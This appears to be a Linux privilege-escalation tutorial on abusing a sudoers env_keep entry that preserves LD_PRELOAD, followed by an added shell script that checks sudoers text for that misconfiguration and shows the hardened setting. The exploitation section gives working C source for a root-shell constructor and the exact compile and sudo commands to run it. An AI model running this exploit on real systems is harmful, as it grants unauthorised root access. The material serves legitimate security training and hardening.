LD_PRELOAD

LD_PRELOAD is an environment variable which can be set to the path of a shared object (.so) file. When it is set, the dynamic linker loads that shared object before any other shared library the program depends on. By building a custom shared object that contains a constructor function (one marked __attribute__((constructor))), we can execute code as soon as the object is loaded, before the program's own main() runs.

Limitations

The dynamic linker ignores LD_PRELOAD when the real user ID differs from the effective user ID (i.e. for setuid/setgid binaries), so the variable cannot be used against sudo itself. For the technique below to work, sudo must be configured to preserve the LD_PRELOAD environment variable when it runs the target command, which is done with the env_keep option in sudoers.

List the commands your user is allowed to run with sudo, together with the Defaults that apply to you:

sudo -l

In the "Matching Defaults entries" part of the output, note whether the env_keep option includes the LD_PRELOAD environment variable.

Exploitation

Create a file (preload.c) with the following contents:

#define _GNU_SOURCE   /* setresuid() is a GNU extension; needed for its prototype */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */

/* Mark hijack() as a constructor so the loader runs it as soon as preload.so is mapped. */
static void hijack(void) __attribute__((constructor));

static void hijack(void) {
    /* Clear LD_LIBRARY_PATH inherited from the environment. */
    unsetenv("LD_LIBRARY_PATH");
    /* Set real, effective and saved UIDs to root; sudo already runs the command as root. */
    setresuid(0, 0, 0);
    /* Spawn a shell; -p keeps the effective UID instead of dropping privileges. */
    system("/bin/bash -p");
}

Compile preload.c to preload.so:

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:

sudo LD_PRELOAD=/tmp/preload.so apache2
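Both the check in the Limitations section and the exploitation steps above hinge on a single sudoers setting: a Defaults line whose env_keep list contains LD_PRELOAD (or LD_LIBRARY_PATH, which the loader honours in the same way). The POSIX shell script below is an added example, not part of the original page, that audits sudoers-style text or the Defaults portion of sudo -l output for such entries and shows what the hardened Defaults would look like once the loader variables are removed. The sudoers content embedded in it is constructed for the demonstration, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original page): find and remove sudoers
# env_keep entries that preserve the dynamic loader's LD_* variables.

# Constructed sudoers snippet for the demonstration; not taken from a real host.
SAMPLE_SUDOERS='Defaults        env_reset
Defaults        mail_badpass
Defaults        env_keep += LD_PRELOAD
Defaults        env_keep += "LD_LIBRARY_PATH HOME"
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
user    ALL=(ALL) NOPASSWD: /usr/sbin/apache2'

# count_loader_env_keep: read sudoers text (or "sudo -l" output) on stdin and
# print the number of lines whose env_keep setting names LD_PRELOAD or
# LD_LIBRARY_PATH. Matches both "env_keep += LD_PRELOAD" (sudoers file) and
# "env_keep+=LD_PRELOAD" (sudo -l); anything after a '#' comment is ignored.
count_loader_env_keep() {
    grep -cE '^[^#]*env_keep[[:space:]]*\+?=[^#]*LD_(PRELOAD|LIBRARY_PATH)' || true
}

# strip_loader_env_keep: emit the input with LD_PRELOAD / LD_LIBRARY_PATH
# removed from every env_keep list; an env_keep line left with nothing to keep
# is dropped entirely. This is the edit an administrator would make via visudo.
strip_loader_env_keep() {
    sed -E '/env_keep/{ s/[[:space:]]*LD_(PRELOAD|LIBRARY_PATH)//g; }' \
        | { grep -vE 'env_keep[[:space:]]*\+?=[[:space:]]*("")?[[:space:]]*$' || true; }
}

# Report on the constructed sample. On a real host, feed it
# "sudo -l" output or a copy of /etc/sudoers instead.
found=$(printf '%s\n' "$SAMPLE_SUDOERS" | count_loader_env_keep)
if [ "$found" -gt 0 ]; then
    echo "WARNING: $found env_keep entries preserve LD_PRELOAD/LD_LIBRARY_PATH:"
    printf '%s\n' "$SAMPLE_SUDOERS" | grep -E 'env_keep.*LD_(PRELOAD|LIBRARY_PATH)'
    echo "Hardened Defaults would read:"
    printf '%s\n' "$SAMPLE_SUDOERS" | strip_loader_env_keep | grep '^Defaults'
else
    echo "OK: no env_keep entry preserves loader variables"
fi
```

Run with sudo -l output piped in (sudo -l | sh -c '. ./audit.sh; count_loader_env_keep') to check the account you are logged in as; a non-zero count is the condition the Exploitation section requires. The sed/grep pair only shows the corrected text; the actual change must go through visudo so the file is syntax-checked before sudo reads it.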
